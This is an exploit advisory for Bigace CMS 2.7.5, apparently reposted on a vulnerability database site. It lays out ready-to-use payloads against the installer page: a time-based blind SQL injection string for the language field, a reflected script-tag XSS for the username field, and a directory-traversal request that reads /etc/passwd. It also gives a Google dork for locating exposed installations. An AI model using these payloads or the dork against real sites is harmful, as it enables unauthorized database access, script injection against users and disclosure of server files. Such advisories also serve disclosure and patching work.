Bigace 2.7.5 LFI / XSS / SQL Injection

2014.03.20
Credit: Dr.3v1l
Risk: High
Local: No
Remote: Yes
CVE: N/A

####################################################################### # # Exploit Title: # Bigace 2.7.5 Blind Sql Injection # Bigace 2.7.5 Cross site scripting # Bigace 2.7.5 Local File Inclusion # Date: 2014 18 March # Author: Dr.3v1l # Vendor Homepage: http://sourceforge.net/projects/bigace/files/bigace_2.7.5.zip # Version : 2.7.5 # Tested on: Windows # Category: webapps # Google Dork: inurl:"/misc/install/index.php?menu=3" # ####################################################################### # # [+] Exploit (SQL Injection): # # http://<server>/bigace_2.7.5/bigace_install_2.7.5/public/index.php # # URL encoded POST input language was set to : # if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ # ####################################################################### # # [+] Exploit (XSS): # # http://<server>/bigace_2.7.5/bigace_install_2.7.5/public/index.php # # URL encoded POST input username was set to : # "><script>alert(/xss/)</script> # The input is reflected inside a tag parameter between double quotes. # ####################################################################### # # [+] Exploit (LFI): # # http://<server>/bigace_2.7.5/bigace_install_2.7.5/public/index.php?menu=3&LANGUAGE=[LFI] # # http://<server>/bigace_2.7.5/bigace_install_2.7.5/public/index.php?menu=3&LANGUAGE=../../../../../../../../../../etc/passwd # ####################################################################### # # [+] Contact Me : # # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # Facebook.com/bdb.0web # Facebook.com/groups/1427166220843499/ # IR.linkedin.com/in/hossein3v1l # Hossein Hezami - Black_Devils B0ys # ####################################################################### # B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , IrSecTeam #######################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top